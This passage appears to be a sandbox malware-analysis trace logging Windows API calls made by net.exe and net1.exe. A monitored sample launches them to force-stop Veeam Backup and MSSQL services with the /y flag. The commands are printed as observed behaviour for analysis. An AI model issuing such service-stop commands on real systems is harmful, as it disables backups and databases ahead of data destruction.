returned -5 [0200.351] LocalFree (hMem=0x78b890) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0xa86 [0200.351] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NAMES\r\nThe follow", _MaxCount=0x11) returned 4 [0200.351] LocalFree (hMem=0x78b890) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x54 [0200.351] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="\r\nFor more inform", _MaxCount=0x11) returned 97 [0200.351] LocalFree (hMem=0x78b890) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0xad [0200.351] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0200.351] LocalFree (hMem=0x78b890) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x2e [0200.351] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0200.351] LocalFree (hMem=0x783fa0) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0x7d [0200.351] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0200.351] LocalFree (hMem=0x78b890) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x26 [0200.351] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0200.351] LocalFree (hMem=0x783fa0) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.351] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0200.351] LocalFree (hMem=0x783fa0) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x1b [0200.351] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0200.351] LocalFree (hMem=0x783fa0) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0xbe [0200.351] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0200.351] LocalFree (hMem=0x78b890) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x33 [0200.351] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0200.351] LocalFree (hMem=0x783fa0) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.351] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0200.351] LocalFree (hMem=0x783fa0) returned 0x0 [0200.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0xc1 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0200.352] LocalFree (hMem=0x78b890) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x16 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0200.352] LocalFree (hMem=0x783fa0) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x33 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0200.352] LocalFree (hMem=0x783fa0) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0x234 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0200.352] LocalFree (hMem=0x78b890) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x13 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.352] LocalFree (hMem=0x783fa0) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.352] LocalFree (hMem=0x783fa0) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.352] LocalFree (hMem=0x783fa0) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.352] LocalFree (hMem=0x783fa0) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.352] LocalFree (hMem=0x783fa0) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x16 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.352] LocalFree (hMem=0x783fa0) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㶸x⡋瓢/㾠x/") returned 0x11 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.352] LocalFree (hMem=0x783db8) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㶸x/") returned 0x14 [0200.352] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.352] LocalFree (hMem=0x783fa0) returned 0x0 [0200.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x12 [0200.353] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.353] LocalFree (hMem=0x783fa0) returned 0x0 [0200.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0xf [0200.353] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.353] LocalFree (hMem=0x783fa0) returned 0x0 [0200.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x17 [0200.353] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.353] LocalFree (hMem=0x783fa0) returned 0x0 [0200.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x18 [0200.353] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0200.353] LocalFree (hMem=0x783fa0) returned 0x0 [0200.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x2a [0200.353] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0200.353] LocalFree (hMem=0x783fa0) returned 0x0 [0200.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.353] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0200.353] GetFileType (hFile=0x26c) returned 0x3 [0200.353] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x2ff378 | out: lpMode=0x2ff378) returned 0 [0200.353] GetConsoleOutputCP () returned 0x1b5 [0200.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0200.354] malloc (_Size=0x16) returned 0x262760 [0200.354] GetConsoleOutputCP () returned 0x1b5 [0200.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x262760, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0200.354] WriteFile (in: hFile=0x26c, lpBuffer=0x262760, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x2ff37c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff37c, lpOverlapped=0x0) returned 0 [0200.354] free (_Block=0x262760) [0200.354] LocalFree (hMem=0x783fa0) returned 0x0 [0200.354] NetApiBufferFree (Buffer=0x781cb8) returned 0x0 [0200.354] NetApiBufferFree (Buffer=0x781cd0) returned 0x0 [0200.355] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥ /y" [0200.355] exit (_Code=1) Process: id = "168" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x60268000" os_pid = "0xc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 341 os_tid = 0x578 Process: id = "169" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6b366000" os_pid = "0x630" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "168" os_parent_pid = "0xc8" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 342 os_tid = 0x68c [0200.498] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fda0 | out: lpSystemTimeAsFileTime=0x24fda0*(dwLowDateTime=0x40b2b1a0, dwHighDateTime=0x1d57a87)) [0200.498] GetCurrentProcessId () returned 0x630 [0200.498] GetCurrentThreadId () returned 0x68c [0200.498] GetTickCount () returned 0x116bc4e [0200.498] QueryPerformanceCounter (in: lpPerformanceCount=0x24fd98 | out: lpPerformanceCount=0x24fd98*=32078291522) returned 1 [0200.499] GetModuleHandleA (lpModuleName=0x0) returned 0xbf0000 [0200.499] __set_app_type (_Type=0x1) [0200.499] __p__fmode () returned 0x74eb31f4 [0200.499] __p__commode () returned 0x74eb31fc [0200.499] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbfffe6) returned 0x0 [0200.499] __getmainargs (in: _Argc=0xc09064, _Argv=0xc0906c, _Env=0xc09068, _DoWildCard=0, _StartInfo=0xc09024 | out: _Argc=0xc09064, _Argv=0xc0906c, _Env=0xc09068) returned 0 [0200.499] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0200.499] GetConsoleOutputCP () returned 0x1b5 [0200.499] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc09080 | out: lpCPInfo=0xc09080) returned 1 [0200.499] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.502] sprintf_s (in: _DstBuf=0x24fd58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0200.502] setlocale (category=0, locale=".437") returned="English_United States.437" [0200.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0200.504] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0200.504] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SBSMONITORING /y" [0200.504] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24fb24, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0200.504] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x7a) returned 0x443c20 [0200.504] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0200.505] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24fd28 | out: Buffer=0x24fd28*=0x441c80) returned 0x0 [0200.505] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24fd28 | out: Buffer=0x24fd28*=0x441c98) returned 0x0 [0200.505] _fileno (_File=0x74eb2900) returned -2 [0200.505] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0200.505] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0200.505] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0200.505] _wcsicmp (_String1="config", _String2="stop") returned -16 [0200.505] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0200.505] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0200.505] _wcsicmp (_String1="file", _String2="stop") returned -13 [0200.505] _wcsicmp (_String1="files", _String2="stop") returned -13 [0200.505] _wcsicmp (_String1="group", _String2="stop") returned -12 [0200.505] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0200.505] _wcsicmp (_String1="help", _String2="stop") returned -11 [0200.505] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0200.505] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0200.505] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0200.505] _wcsicmp (_String1="session", _String2="stop") returned -15 [0200.505] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0200.505] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0200.505] _wcsicmp (_String1="share", _String2="stop") returned -12 [0200.505] _wcsicmp (_String1="start", _String2="stop") returned -14 [0200.505] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0200.505] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0200.505] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0200.505] _wcsicmp (_String1="accounts", _String2="MSSQL$SBSMONITORING") returned -12 [0200.505] _wcsicmp (_String1="computer", _String2="MSSQL$SBSMONITORING") returned -10 [0200.506] _wcsicmp (_String1="config", _String2="MSSQL$SBSMONITORING") returned -10 [0200.506] _wcsicmp (_String1="continue", _String2="MSSQL$SBSMONITORING") returned -10 [0200.506] _wcsicmp (_String1="cont", _String2="MSSQL$SBSMONITORING") returned -10 [0200.506] _wcsicmp (_String1="file", _String2="MSSQL$SBSMONITORING") returned -7 [0200.506] _wcsicmp (_String1="files", _String2="MSSQL$SBSMONITORING") returned -7 [0200.506] _wcsicmp (_String1="group", _String2="MSSQL$SBSMONITORING") returned -6 [0200.506] _wcsicmp (_String1="groups", _String2="MSSQL$SBSMONITORING") returned -6 [0200.506] _wcsicmp (_String1="help", _String2="MSSQL$SBSMONITORING") returned -5 [0200.506] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SBSMONITORING") returned -5 [0200.506] _wcsicmp (_String1="localgroup", _String2="MSSQL$SBSMONITORING") returned -1 [0200.506] _wcsicmp (_String1="pause", _String2="MSSQL$SBSMONITORING") returned 3 [0200.506] _wcsicmp (_String1="session", _String2="MSSQL$SBSMONITORING") returned 6 [0200.506] _wcsicmp (_String1="sessions", _String2="MSSQL$SBSMONITORING") returned 6 [0200.506] _wcsicmp (_String1="sess", _String2="MSSQL$SBSMONITORING") returned 6 [0200.506] _wcsicmp (_String1="share", _String2="MSSQL$SBSMONITORING") returned 6 [0200.506] _wcsicmp (_String1="start", _String2="MSSQL$SBSMONITORING") returned 6 [0200.506] _wcsicmp (_String1="stats", _String2="MSSQL$SBSMONITORING") returned 6 [0200.506] _wcsicmp (_String1="statistics", _String2="MSSQL$SBSMONITORING") returned 6 [0200.506] _wcsicmp (_String1="stop", _String2="MSSQL$SBSMONITORING") returned 6 [0200.506] _wcsicmp (_String1="time", _String2="MSSQL$SBSMONITORING") returned 7 [0200.506] _wcsicmp (_String1="user", _String2="MSSQL$SBSMONITORING") returned 8 [0200.506] _wcsicmp (_String1="users", _String2="MSSQL$SBSMONITORING") returned 8 [0200.506] _wcsicmp (_String1="msg", _String2="MSSQL$SBSMONITORING") returned -12 [0200.506] _wcsicmp (_String1="messenger", _String2="MSSQL$SBSMONITORING") returned -14 [0200.506] _wcsicmp (_String1="receiver", _String2="MSSQL$SBSMONITORING") returned 5 [0200.506] _wcsicmp (_String1="rcv", _String2="MSSQL$SBSMONITORING") returned 5 [0200.506] _wcsicmp (_String1="netpopup", _String2="MSSQL$SBSMONITORING") returned 1 [0200.506] _wcsicmp (_String1="redirector", _String2="MSSQL$SBSMONITORING") returned 5 [0200.506] _wcsicmp (_String1="redir", _String2="MSSQL$SBSMONITORING") returned 5 [0200.506] _wcsicmp (_String1="rdr", _String2="MSSQL$SBSMONITORING") returned 5 [0200.506] _wcsicmp (_String1="workstation", _String2="MSSQL$SBSMONITORING") returned 10 [0200.506] _wcsicmp (_String1="work", _String2="MSSQL$SBSMONITORING") returned 10 [0200.506] _wcsicmp (_String1="wksta", _String2="MSSQL$SBSMONITORING") returned 10 [0200.506] _wcsicmp (_String1="prdr", _String2="MSSQL$SBSMONITORING") returned 3 [0200.506] _wcsicmp (_String1="devrdr", _String2="MSSQL$SBSMONITORING") returned -9 [0200.506] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SBSMONITORING") returned -1 [0200.506] _wcsicmp (_String1="server", _String2="MSSQL$SBSMONITORING") returned 6 [0200.507] _wcsicmp (_String1="svr", _String2="MSSQL$SBSMONITORING") returned 6 [0200.507] _wcsicmp (_String1="srv", _String2="MSSQL$SBSMONITORING") returned 6 [0200.507] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SBSMONITORING") returned -1 [0200.507] _wcsicmp (_String1="alerter", _String2="MSSQL$SBSMONITORING") returned -12 [0200.507] _wcsicmp (_String1="netlogon", _String2="MSSQL$SBSMONITORING") returned 1 [0200.507] _wcsupr (in: _String="MSSQL$SBSMONITORING" | out: _String="MSSQL$SBSMONITORING") returned="MSSQL$SBSMONITORING" [0200.507] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4454f0 [0200.510] GetServiceKeyNameW (in: hSCManager=0x4454f0, lpDisplayName="MSSQL$SBSMONITORING", lpServiceName=0xc0aaf0, lpcchBuffer=0x24fcc4 | out: lpServiceName="", lpcchBuffer=0x24fcc4) returned 0 [0200.510] _wcsicmp (_String1="msg", _String2="MSSQL$SBSMONITORING") returned -12 [0200.510] _wcsicmp (_String1="messenger", _String2="MSSQL$SBSMONITORING") returned -14 [0200.510] _wcsicmp (_String1="receiver", _String2="MSSQL$SBSMONITORING") returned 5 [0200.510] _wcsicmp (_String1="rcv", _String2="MSSQL$SBSMONITORING") returned 5 [0200.510] _wcsicmp (_String1="redirector", _String2="MSSQL$SBSMONITORING") returned 5 [0200.510] _wcsicmp (_String1="redir", _String2="MSSQL$SBSMONITORING") returned 5 [0200.510] _wcsicmp (_String1="rdr", _String2="MSSQL$SBSMONITORING") returned 5 [0200.510] _wcsicmp (_String1="workstation", _String2="MSSQL$SBSMONITORING") returned 10 [0200.510] _wcsicmp (_String1="work", _String2="MSSQL$SBSMONITORING") returned 10 [0200.510] _wcsicmp (_String1="wksta", _String2="MSSQL$SBSMONITORING") returned 10 [0200.510] _wcsicmp (_String1="prdr", _String2="MSSQL$SBSMONITORING") returned 3 [0200.510] _wcsicmp (_String1="devrdr", _String2="MSSQL$SBSMONITORING") returned -9 [0200.510] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SBSMONITORING") returned -1 [0200.510] _wcsicmp (_String1="server", _String2="MSSQL$SBSMONITORING") returned 6 [0200.510] _wcsicmp (_String1="svr", _String2="MSSQL$SBSMONITORING") returned 6 [0200.510] _wcsicmp (_String1="srv", _String2="MSSQL$SBSMONITORING") returned 6 [0200.510] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SBSMONITORING") returned -1 [0200.510] _wcsicmp (_String1="alerter", _String2="MSSQL$SBSMONITORING") returned -12 [0200.510] _wcsicmp (_String1="netlogon", _String2="MSSQL$SBSMONITORING") returned 1 [0200.510] NetServiceControl (in: servername=0x0, service="MSSQL$SBSMONITORING", opcode=0x0, arg=0x0, bufptr=0x24fcc0 | out: bufptr=0x24fcc0) returned 0x889 [0200.511] wcscpy_s (in: _Destination=0xc0a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0200.511] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0200.512] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc0b338, nSize=0x800, Arguments=0xc09dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0200.513] GetFileType (hFile=0x26c) returned 0x3 [0200.513] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x444020 [0200.513] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x444020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nC", lpUsedDefaultChar=0x0) returned 30 [0200.513] WriteFile (in: hFile=0x26c, lpBuffer=0x444020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x24fc00, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24fc00, lpOverlapped=0x0) returned 0 [0200.513] LocalFree (hMem=0x444020) returned 0x0 [0200.513] GetFileType (hFile=0x26c) returned 0x3 [0200.513] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4462c8 [0200.513] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4462c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nD", lpUsedDefaultChar=0x0) returned 2 [0200.513] WriteFile (in: hFile=0x26c, lpBuffer=0x4462c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24fc00, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24fc00, lpOverlapped=0x0) returned 0 [0200.513] LocalFree (hMem=0x4462c8) returned 0x0 [0200.513] _ultow (in: _Dest=0x889, _Radix=2423856 | out: _Dest=0x889) returned="2185" [0200.513] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc0b338, nSize=0x800, Arguments=0xc09dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0200.514] GetFileType (hFile=0x26c) returned 0x3 [0200.514] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4462c8 [0200.514] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4462c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0200.514] WriteFile (in: hFile=0x26c, lpBuffer=0x4462c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x24fc0c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24fc0c, lpOverlapped=0x0) returned 0 [0200.514] LocalFree (hMem=0x4462c8) returned 0x0 [0200.514] GetFileType (hFile=0x26c) returned 0x3 [0200.514] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4462c8 